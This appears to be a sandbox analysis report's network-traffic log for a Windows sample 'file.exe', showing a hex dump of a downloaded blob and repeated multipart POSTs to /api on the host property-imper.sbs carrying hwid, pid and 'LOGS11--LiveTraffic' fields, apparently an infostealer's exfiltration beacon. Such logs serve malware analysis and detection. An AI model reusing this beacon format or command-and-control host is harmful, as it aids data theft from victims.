                                                                              2024-11-23 20:08:10 UTC360INData Raw: 63 63 35 0d 0a 67 38 34 70 58 63 65 44 69 45 37 36 6c 5a 6c 66 58 41 67 73 35 74 30 69 57 58 30 7a 6d 67 39 72 42 38 5a 34 58 32 6b 45 6e 6d 33 34 37 46 39 2f 2f 62 65 6b 62 49 6e 77 75 32 55 6f 65 6c 6d 44 38 51 41 34 47 52 47 67 61 51 70 72 74 52 31 7a 53 33 4c 7a 54 37 6d 6f 53 44 47 30 35 71 52 73 6e 2b 32 37 5a 51 64 7a 44 6f 4f 7a 41 47 4e 66 56 76 42 74 43 6d 75 6b 47 54 51 47 64 50 49 4f 36 36 4a 4f 4e 61 4c 67 37 43 2b 57 2b 50 77 36 4f 57 6c 47 69 4c 52 50 4d 52 41 52 74 69 30 4f 66 65 52 43 66 53 52 68 36 67 7a 4f 72 31 6f 32 35 66 36 6b 4e 64 6a 77 39 33 31 6d 4b 6b 32 44 76 30 34 2f 47 56 6a 79 5a 77 4e 6a 70 52 77 31 47 57 33 34 42 65 75 73 54 54 53 6f 36 66 67 69 6e 50 2f 33 50 44 4e 70 44 73 72 2f 52 79 4e 66 43 62 67 2b 4f 32 61 31 43 79
                                                                              Data Ascii: cc5g84pXceDiE76lZlfXAgs5t0iWX0zmg9rB8Z4X2kEnm347F9//bekbInwu2UoelmD8QA4GRGgaQprtR1zS3LzT7moSDG05qRsn+27ZQdzDoOzAGNfVvBtCmukGTQGdPIO66JONaLg7C+W+Pw6OWlGiLRPMRARti0OfeRCfSRh6gzOr1o25f6kNdjw931mKk2Dv04/GVjyZwNjpRw1GW34BeusTTSo6fginP/3PDNpDsr/RyNfCbg+O2a1Cy
                                                                              2024-11-23 20:08:10 UTC1369INData Raw: 77 4f 43 78 68 52 34 6d 79 51 44 59 56 58 76 74 74 44 6d 2b 75 46 54 63 50 61 2f 45 4a 34 61 77 4c 63 65 58 6d 38 6d 7a 41 74 39 67 34 4c 6d 31 43 6b 76 31 36 65 77 41 66 34 53 30 4f 61 65 52 43 66 51 4e 6a 2f 77 7a 71 6f 30 67 33 72 76 50 71 50 70 37 36 2f 69 38 34 62 30 43 4f 76 46 49 78 45 56 66 37 5a 41 4a 73 6f 52 30 35 53 79 69 38 43 50 6e 73 45 33 2b 45 37 4f 45 67 6b 75 44 37 66 53 45 6b 56 38 53 34 54 48 74 48 45 66 78 73 44 57 53 67 46 44 4d 50 61 76 6f 42 37 4b 4e 4e 4e 61 58 6d 34 43 53 51 39 76 59 32 4d 57 70 4c 69 62 74 47 4e 78 35 55 75 43 4e 4a 59 72 78 61 5a 55 74 49 2b 77 7a 7a 37 6e 34 38 71 2b 2f 74 4f 74 6a 6f 74 53 52 2b 62 55 4c 45 35 77 41 31 47 6c 37 71 62 42 74 67 71 67 67 78 44 6d 44 78 44 4f 2b 73 54 6a 69 6f 37 2b 77 72 6d 2f
                                                                              Data Ascii: wOCxhR4myQDYVXvttDm+uFTcPa/EJ4awLceXm8mzAt9g4Lm1Ckv16ewAf4S0OaeRCfQNj/wzqo0g3rvPqPp76/i84b0COvFIxEVf7ZAJsoR05Syi8CPnsE3+E7OEgkuD7fSEkV8S4THtHEfxsDWSgFDMPavoB7KNNNaXm4CSQ9vY2MWpLibtGNx5UuCNJYrxaZUtI+wzz7n48q+/tOtjotSR+bULE5wA1Gl7qbBtgqggxDmDxDO+sTjio7+wrm/
                                                                              2024-11-23 20:08:10 UTC1369INData Raw: 62 55 4c 45 35 77 41 33 46 6c 48 7a 5a 77 31 6c 6f 78 63 34 43 47 48 2f 41 75 61 6d 52 54 69 68 37 65 4d 68 6e 76 66 38 4f 54 74 34 53 34 32 7a 54 48 74 52 45 66 39 31 53 54 33 6b 4e 54 6f 64 5a 64 4d 4d 38 4b 55 4c 49 4f 76 34 71 69 75 55 74 36 4e 39 4f 57 39 47 6a 37 6c 49 4f 77 31 55 39 6d 59 49 62 36 49 62 4d 41 64 67 2f 41 37 68 71 6b 63 2f 6f 75 62 34 50 70 33 78 36 54 64 2b 4a 41 36 44 70 77 42 6a 58 32 66 6f 65 68 68 7a 35 69 38 2b 42 57 6a 37 47 61 47 7a 42 53 62 6c 35 75 5a 73 77 4c 66 77 50 54 4a 74 52 6f 4b 37 53 44 51 51 57 4f 70 73 42 57 75 32 48 54 30 43 61 50 4d 44 36 4b 46 4d 4d 71 37 72 35 79 69 66 39 72 74 7a 66 6d 31 57 78 4f 63 41 44 51 39 63 39 45 4d 43 61 61 31 61 49 6b 56 2f 76 41 6a 74 37 42 4e 2f 6f 65 33 69 4a 70 66 2b 38 54 63
                                                                              Data Ascii: bULE5wA3FlHzZw1loxc4CGH/AuamRTih7eMhnvf8OTt4S42zTHtREf91ST3kNTodZdMM8KULIOv4qiuUt6N9OW9Gj7lIOw1U9mYIb6IbMAdg/A7hqkc/oub4Pp3x6Td+JA6DpwBjX2foehhz5i8+BWj7GaGzBSbl5uZswLfwPTJtRoK7SDQQWOpsBWu2HT0CaPMD6KFMMq7r5yif9rtzfm1WxOcADQ9c9EMCaa1aIkV/vAjt7BN/oe3iJpf+8Tc
                                                                              2024-11-23 20:08:10 UTC178INData Raw: 72 41 41 64 56 39 57 34 43 31 52 4a 59 73 39 43 45 6c 48 78 6b 2f 2b 34 6c 4a 2f 6f 75 32 71 64 4e 6a 37 2b 44 45 32 5a 55 69 4e 73 30 6f 79 46 46 33 7a 61 51 56 73 6f 52 77 38 44 6d 50 39 43 2b 32 6d 54 54 79 6d 37 75 55 6a 6b 4c 65 31 66 54 6c 79 44 74 7a 2f 5a 53 77 55 58 2f 34 74 46 69 75 39 57 6a 6f 48 4a 71 52 50 37 61 56 4e 4f 61 44 74 36 79 71 51 38 76 4d 35 50 32 78 49 68 37 42 45 50 68 35 65 2f 47 45 48 62 36 55 62 4d 51 42 70 39 77 71 68 34 67 73 34 76 61 47 79 62 4b 6e 30 37 53 6f 75 5a 67 36 62 38 56 6c 37 47 0d 0a
                                                                              Data Ascii: rAAdV9W4C1RJYs9CElHxk/+4lJ/ou2qdNj7+DE2ZUiNs0oyFF3zaQVsoRw8DmP9C+2mTTym7uUjkLe1fTlyDtz/ZSwUX/4tFiu9WjoHJqRP7aVNOaDt6yqQ8vM5P2xIh7BEPh5e/GEHb6UbMQBp9wqh4gs4vaGybKn07SouZg6b8Vl7G
                                                                              2024-11-23 20:08:10 UTC1369INData Raw: 32 30 66 39 0d 0a 46 32 34 4e 55 6c 6b 74 68 41 33 42 57 50 7a 43 75 4b 6a 54 44 4b 6a 37 65 41 6c 6b 50 48 30 4e 43 78 70 51 6f 71 34 54 6a 63 52 58 50 4a 75 42 43 58 71 57 6a 6f 54 4a 71 52 50 7a 61 74 47 45 61 37 74 37 57 79 48 75 65 4a 39 4f 57 59 4f 33 50 39 4d 4d 52 4e 59 2b 47 51 4d 62 61 38 54 4f 41 70 74 2b 51 7a 6e 6f 55 51 32 74 2b 76 70 49 70 76 37 39 7a 73 2f 61 56 79 4d 74 67 42 31 58 31 62 67 4c 56 45 6c 68 52 51 77 48 32 48 73 54 2f 37 69 55 6e 2b 69 37 61 70 30 32 50 54 36 4d 6a 31 72 51 34 4b 32 53 44 73 5a 56 50 64 67 42 32 4b 6a 47 6a 41 46 61 66 6f 48 37 4b 42 41 4d 61 7a 6e 36 69 32 53 74 37 56 39 4f 58 49 4f 33 50 39 77 4f 42 39 52 34 79 30 57 4b 37 31 61 4f 67 63 6d 70 45 2f 7a 70 6b 49 2f 70 75 37 74 4b 4a 50 37 2f 6a 67 78 61 55
                                                                              Data Ascii: 20f9F24NUlkthA3BWPzCuKjTDKj7eAlkPH0NCxpQoq4TjcRXPJuBCXqWjoTJqRPzatGEa7t7WyHueJ9OWYO3P9MMRNY+GQMba8TOApt+QznoUQ2t+vpIpv79zs/aVyMtgB1X1bgLVElhRQwH2HsT/7iUn+i7ap02PT6Mj1rQ4K2SDsZVPdgB2KjGjAFafoH7KBAMazn6i2St7V9OXIO3P9wOB9R4y0WK71aOgcmpE/zpkI/pu7tKJP7/jgxaU
                                                                              2024-11-23 20:08:10 UTC1369INData Raw: 49 6c 39 57 39 43 31 52 4a 61 55 57 4d 67 68 70 2f 77 7a 67 70 6c 6b 74 71 65 6a 69 4b 5a 54 38 39 54 73 73 62 45 47 4e 76 45 4d 79 47 46 6e 30 5a 77 70 69 35 46 52 39 44 48 36 38 56 36 47 50 58 43 2b 6f 6f 66 56 69 67 62 66 38 4d 58 34 79 44 6f 79 79 53 44 45 62 56 76 56 71 44 32 79 32 45 7a 67 46 5a 76 67 45 37 71 70 50 50 4b 58 7a 37 43 69 51 39 50 59 77 4d 47 6c 4b 78 50 45 41 50 41 63 52 6f 43 30 37 61 4b 6f 42 4d 67 78 33 39 6b 2f 2b 34 6c 4a 2f 6f 75 32 71 64 4e 6a 7a 39 53 38 31 61 30 57 50 73 55 63 30 47 6c 76 34 59 67 31 6d 71 68 45 38 43 47 37 78 41 75 2b 6d 51 6a 61 69 37 65 34 72 32 4c 6d 37 4f 69 59 71 46 73 53 55 59 52 59 7a 56 75 49 74 46 69 75 39 57 6a 6f 48 4a 71 52 50 37 61 56 48 4e 61 37 6d 34 43 4b 52 2b 66 41 76 4c 47 6c 4b 68 37 5a
                                                                              Data Ascii: Il9W9C1RJaUWMghp/wzgplktqejiKZT89TssbEGNvEMyGFn0Zwpi5FR9DH68V6GPXC+oofVigbf8MX4yDoyySDEbVvVqD2y2EzgFZvgE7qpPPKXz7CiQ9PYwMGlKxPEAPAcRoC07aKoBMgx39k/+4lJ/ou2qdNjz9S81a0WPsUc0Glv4Yg1mqhE8CG7xAu+mQjai7e4r2Lm7OiYqFsSUYRYzVuItFiu9WjoHJqRP7aVHNa7m4CKR+fAvLGlKh7Z
                                                                              2024-11-23 20:08:10 UTC1369INData Raw: 50 35 75 44 53 58 71 57 6a 6f 54 4a 71 52 50 7a 4b 42 4d 46 71 4c 36 71 6a 50 57 37 72 73 36 4d 69 6f 57 78 4c 35 4c 4d 52 42 63 2b 32 73 4b 62 71 45 51 50 41 78 75 38 52 33 69 6f 30 51 37 70 65 37 73 4b 70 6e 34 2f 54 6f 33 61 30 61 44 2f 77 35 37 47 45 6d 34 4e 55 6c 4c 6f 78 6b 35 53 33 6d 79 46 71 47 72 52 33 2f 39 6f 65 6f 6d 6b 76 33 31 50 54 6c 34 53 49 32 2f 51 79 6b 63 56 2f 42 72 42 57 6d 70 45 6a 51 4c 59 2f 63 43 36 71 46 4e 50 36 37 67 71 6d 4c 59 38 4f 4e 39 5a 69 70 2f 69 62 46 45 4e 52 78 42 2f 79 30 57 4b 37 31 61 4f 67 63 6d 70 45 2f 75 70 56 6b 34 6f 4f 6e 6a 4c 4a 62 2b 38 6a 6f 36 61 55 2b 41 73 30 38 79 48 46 6e 35 5a 51 5a 6d 70 42 45 31 41 57 66 79 43 71 48 69 43 7a 69 39 6f 62 4a 73 74 2f 54 2b 4e 6a 38 6f 61 59 4b 34 54 48 73 41
                                                                              Data Ascii: P5uDSXqWjoTJqRPzKBMFqL6qjPW7rs6MioWxL5LMRBc+2sKbqEQPAxu8R3io0Q7pe7sKpn4/To3a0aD/w57GEm4NUlLoxk5S3myFqGrR3/9oeomkv31PTl4SI2/QykcV/BrBWmpEjQLY/cC6qFNP67gqmLY8ON9Zip/ibFENRxB/y0WK71aOgcmpE/upVk4oOnjLJb+8jo6aU+As08yHFn5ZQZmpBE1AWfyCqHiCzi9obJst/T+Nj8oaYK4THsA
                                                                              2024-11-23 20:08:10 UTC1369INData Raw: 6c 51 70 78 51 7a 44 48 44 74 51 73 61 32 52 6a 6d 79 38 4b 70 69 32 50 47 37 5a 57 34 6b 44 6f 43 75 41 47 4e 50 41 36 4d 34 57 6a 4c 30 53 43 4a 46 66 37 77 5a 6f 66 51 5a 63 65 58 7a 71 6e 54 59 73 50 67 76 4c 47 78 4e 6b 72 77 48 42 53 46 2f 2f 32 73 4d 59 72 52 59 45 77 42 79 2b 30 2b 76 37 45 52 2f 2f 64 69 71 5a 4e 6a 49 74 58 30 6d 4b 68 62 45 69 6b 4d 31 45 56 62 75 66 45 52 4c 6f 78 77 34 44 48 61 2b 49 65 71 34 54 48 2f 72 6f 65 78 73 77 4b 65 31 66 54 70 37 44 74 7a 76 45 6d 42 4b 41 71 38 39 57 33 72 71 41 33 30 64 4a 71 52 64 72 2b 78 5a 66 2f 32 68 72 53 2b 4b 35 66 30 2b 4b 47 6b 4a 75 6f 46 44 4c 52 4a 65 38 32 77 33 57 34 6f 58 50 41 68 6f 76 6a 37 33 6f 56 73 38 6f 4f 62 55 45 70 62 77 37 7a 6f 77 62 45 37 45 38 51 41 30 58 77 6e 42 4c
                                                                              Data Ascii: lQpxQzDHDtQsa2Rjmy8Kpi2PG7ZW4kDoCuAGNPA6M4WjL0SCJFf7wZofQZceXzqnTYsPgvLGxNkrwHBSF//2sMYrRYEwBy+0+v7ER//diqZNjItX0mKhbEikM1EVbufERLoxw4DHa+Ieq4TH/roexswKe1fTp7DtzvEmBKAq89W3rqA30dJqRdr+xZf/2hrS+K5f0+KGkJuoFDLRJe82w3W4oXPAhovj73oVs8oObUEpbw7zowbE7E8QA0XwnBL
                                                                              2024-11-23 20:08:10 UTC1369INData Raw: 61 5a 56 73 30 70 31 71 79 2b 78 74 74 75 71 2f 7a 62 49 36 33 6f 32 39 77 4b 6c 7a 45 35 77 42 38 48 45 50 71 61 77 70 7a 70 31 30 44 4e 55 48 79 43 4f 43 36 57 7a 4b 70 77 4f 6b 39 6b 73 6e 46 4b 44 31 6b 51 49 4f 70 55 58 74 52 45 66 63 74 55 56 7a 6b 55 6e 30 30 4b 4c 77 58 6f 66 51 4c 43 71 62 76 35 43 75 4f 35 72 59 61 4d 47 31 50 6b 71 39 4e 4e 7a 35 53 36 57 64 4a 4b 2b 51 63 66 56 4d 30 73 6b 2f 6c 76 51 74 6e 39 62 4f 78 65 63 75 67 71 32 38 68 4a 46 66 45 71 51 42 6a 54 52 2b 34 66 30 6b 39 35 46 30 2b 47 58 54 36 44 50 65 76 44 41 47 62 78 50 30 76 69 50 48 34 41 77 42 42 51 6f 4b 34 57 6a 77 5a 64 39 67 74 52 79 57 72 57 6d 55 79 4a 72 52 50 33 75 49 4c 4a 2b 57 35 71 68 6d 62 2b 66 55 36 4b 48 73 44 6f 61 68 44 4b 78 6c 53 75 43 4e 4a 59 2b
                                                                              Data Ascii: aZVs0p1qy+xttuq/zbI63o29wKlzE5wB8HEPqawpzp10DNUHyCOC6WzKpwOk9ksnFKD1kQIOpUXtREfctUVzkUn00KLwXofQLCqbv5CuO5rYaMG1Pkq9NNz5S6WdJK+QcfVM0sk/lvQtn9bOxecugq28hJFfEqQBjTR+4f0k95F0+GXT6DPevDAGbxP0viPH4AwBBQoK4WjwZd9gtRyWrWmUyJrRP3uILJ+W5qhmb+fU6KHsDoahDKxlSuCNJY+


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.1049703104.21.33.1164437616C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-23 20:08:12 UTC276OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=JA37Y1KT9Z
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 12805
                                                                              Host: property-imper.sbs
                                                                              2024-11-23 20:08:12 UTC12805OUTData Raw: 2d 2d 4a 41 33 37 59 31 4b 54 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 33 43 35 44 46 33 39 30 37 32 31 36 39 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4a 41 33 37 59 31 4b 54 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4a 41 33 37 59 31 4b 54 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4a 41 33 37 59 31 4b 54 39 5a 0d 0a 43 6f
                                                                              Data Ascii: --JA37Y1KT9ZContent-Disposition: form-data; name="hwid"F53C5DF390721698D7CBBD6DF28D3732--JA37Y1KT9ZContent-Disposition: form-data; name="pid"2--JA37Y1KT9ZContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--JA37Y1KT9ZCo
                                                                              2024-11-23 20:08:13 UTC1021INHTTP/1.1 200 OK
                                                                              Date: Sat, 23 Nov 2024 20:08:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=vupesrct5kg4pc23snm2idvvol; expires=Wed, 19-Mar-2025 13:54:51 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T2DgykmsNI8ic3s%2BdxZnrF8OKHz%2FT0R0fHfxsyxnZ8k735kRgKln7%2BUly31X4cEKe9RsVxabyIRNmCZ%2FsOPnA94QP7Azb3m5SWdtWg7k%2FL3qxCAN2WzXbaasE9CpMNT24G93XaY%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e73ca35e952433f-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1751&sent=11&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13739&delivery_rate=1606160&cwnd=215&unsent_bytes=0&cid=1a33ae5011c7cc82&ts=900&x=0"
                                                                              2024-11-23 20:08:13 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                              Data Ascii: eok 8.46.123.75
                                                                              2024-11-23 20:08:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.1049709104.21.33.1164437616C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-23 20:08:14 UTC282OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=86UOV4B9XX35O2AY
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 15068
                                                                              Host: property-imper.sbs
                                                                              2024-11-23 20:08:14 UTC15068OUTData Raw: 2d 2d 38 36 55 4f 56 34 42 39 58 58 33 35 4f 32 41 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 33 43 35 44 46 33 39 30 37 32 31 36 39 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 38 36 55 4f 56 34 42 39 58 58 33 35 4f 32 41 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 36 55 4f 56 34 42 39 58 58 33 35 4f 32 41 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                              Data Ascii: --86UOV4B9XX35O2AYContent-Disposition: form-data; name="hwid"F53C5DF390721698D7CBBD6DF28D3732--86UOV4B9XX35O2AYContent-Disposition: form-data; name="pid"2--86UOV4B9XX35O2AYContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                              2024-11-23 20:08:15 UTC1019INHTTP/1.1 200 OK
                                                                              Date: Sat, 23 Nov 2024 20:08:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=rsbaj60h7i25ii04e39sod2fp2; expires=Wed, 19-Mar-2025 13:54:54 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LGP39GVK%2FER9%2FeBxlZBfgcEhMKnqp9s8DwsYnj6y8nKdNu9m1qIIPEoUENddaq8qDaprdoF3XvPSydlFOzjuiy2gAcd6k1hWc5TswwYWyeqJlKHFGs2ymwrzdTzprOsiL%2BjA%2BiM%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e73ca445d3142e4-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1614&sent=13&recv=19&lost=0&retrans=0&sent_bytes=2846&recv_bytes=16008&delivery_rate=1783750&cwnd=228&unsent_bytes=0&cid=2e8366f8b7665281&ts=912&x=0"
                                                                              2024-11-23 20:08:15 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                              Data Ascii: eok 8.46.123.75
                                                                              2024-11-23 20:08:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.1049715104.21.33.1164437616C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-23 20:08:17 UTC276OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=KAJTQ45B64
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 20394
                                                                              Host: property-imper.sbs
                                                                              2024-11-23 20:08:17 UTC15331OUTData Raw: 2d 2d 4b 41 4a 54 51 34 35 42 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 33 43 35 44 46 33 39 30 37 32 31 36 39 38 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 4b 41 4a 54 51 34 35 42 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 41 4a 54 51 34 35 42 36 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4b 41 4a 54 51 34 35 42 36 34 0d 0a 43 6f
                                                                              Data Ascii: --KAJTQ45B64Content-Disposition: form-data; name="hwid"F53C5DF390721698D7CBBD6DF28D3732--KAJTQ45B64Content-Disposition: form-data; name="pid"3--KAJTQ45B64Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--KAJTQ45B64Co
                                                                              2024-11-23 20:08:17 UTC5063OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 6c 70 fd 51 30 bf e1 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d ae 2f 0a e6 37 fc 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c1 f5 47 c1 fc 86 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b8 be 28 98 df f0 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 d7 1f 05 f3 1b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e0 fa a2 60 7e c3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 5c 5f f0 2b
                                                                              Data Ascii: lpQ0/74G6(~`~O\_+
                                                                              2024-11-23 20:08:18 UTC1017INHTTP/1.1 200 OK
                                                                              Date: Sat, 23 Nov 2024 20:08:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=674rgh94i27c05qq15lgib3ime; expires=Wed, 19-Mar-2025 13:54:56 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7pPqloF0oCPJXNkNF0mYJutyRnW5Ggop9a449Rc8sX8E2pIo%2FJjMSwvR%2Fq4NyHzBoVF%2F4ODGFyyOWrmAUZDPChlW0DlveVyhT1ir1IC36M5Cx0MycpBxjxb8RiDpwIv9Box1V9k%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8e73ca55292c80e0-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1539&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21350&delivery_rate=1940199&cwnd=202&unsent_bytes=0&cid=fe1fdcc9d14f9b69&ts=939&x=0"
                                                                              2024-11-23 20:08:18 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                              Data Ascii: eok 8.46.123.75
                                                                              2024-11-23 20:08:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.1049721104.21.33.1164437616C:\Users\user\Desktop\file.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-23 20:08:19 UTC273OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=KPU5JZ60
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 1190
                                                                              Host: property-imper.sbs
